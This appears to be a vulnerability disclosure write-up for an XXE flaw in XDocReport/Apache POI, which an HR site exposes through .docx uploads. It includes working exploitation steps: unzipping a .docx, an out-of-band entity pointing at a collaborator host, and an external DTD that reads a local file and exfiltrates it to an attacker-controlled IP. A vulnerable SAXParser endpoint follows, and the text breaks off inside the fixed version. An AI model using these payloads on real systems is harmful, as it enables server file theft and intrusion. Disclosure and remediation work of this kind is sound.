
CVE-2025-65482 (XXE)
XML External Entity Injection
Vulnerability Overview
Business Impact
The HR management website allows users to upload .docx document files to the system. During processing, the application uses the fr.opensagres.xdocreport.document.docx library which contains an XXE vulnerability when passing the user's .docx file through SAXParser.
fr.opensagres.xdocreport.template.docx — XDocReport (versions =< 2.0.3)
The cause is the use of Apache POI
fr.opensagres.xdocreport.document.docx
└── fr.opensagres.xdocreport.document
└── fr.opensagres.xdocreport.template
└── fr.opensagres.xdocreport.converter
└── org.apache.poi.xwpf.converter.core
├── org.apache.poi:poi
└── org.apache.poi:poi-ooxml
That is, Apache POI is deep inside, in the module:
org.apache.poi.xwpf.converter.core
The error occurs because XDocReport (in the module fr.opensagres.xdocreport.document.docx) uses Apache POI to read .docx files, and POI uses the default Java SAXParser without disabling features that allow DTD and External Entity processing. → This allows an attacker to inject a DOCTYPE with an entity pointing externally (SYSTEM "http://...") or to an internal file (file:///...) → leading to XXE.
XDocReport → fr.opensagres.xdocreport.document.docx → Apache POI (org.apache.poi.xwpf.converter.core) → SAXParser (javax.xml.parsers.SAXParser)
unzip ../vcspentest.docx
nano word/document.xml
edit with the out-of-band payload to pass through the collaborator as follows:
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://qrlbu64xvd8jr1y8zwcgoiwnler5fx3m.oastify.com/"> ]>
<x>&xxe;</x>
zip -r ../poc.docx *
172.26.208.130. The content of the vcspentest.dtd file is as follows:<!ENTITY % file SYSTEM "file:///d:/vcspentest.txt">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://172.26.208.130:8888/?x=%file;'>">
%eval;
%exfil;
Edit the word/document.xml file inside the .docx with the following content to load the external dtd from the WSL machine:
<!DOCTYPE users [<!ENTITY % xxe SYSTEM "http://172.26.208.130:8888/vcspentest.dtd"> %xxe;]>
.docx and upload it to the server for processingD:/vcspentest.txt from the target serverIn the code or at the XML parser configuration layer, all features related to DTD and external entities must be disabled.
A fix similar to this code
@RequestMapping(value = "/SAXParser/vuln", method = RequestMethod.POST)
public String SAXParserVuln(HttpServletRequest request) {
try {
String body = WebUtils.getRequestBody(request);
logger.info(body);
SAXParserFactory spf = SAXParserFactory.newInstance();
SAXParser parser = spf.newSAXParser();
parser.parse(new InputSource(new StringReader(body)), new DefaultHandler()); // parse xml
return "SAXParser xxe vuln code";
} catch (Exception e) {
logger.error(e.toString());
return EXCEPT;
}
}
@RequestMapping(value = "/SAXParser/sec", method = RequestMethod.POST)
public String SAXParserSec(HttpServletRequest request) {
try {
String body = WebUtils.getRequestBody(request);
logger.info(body);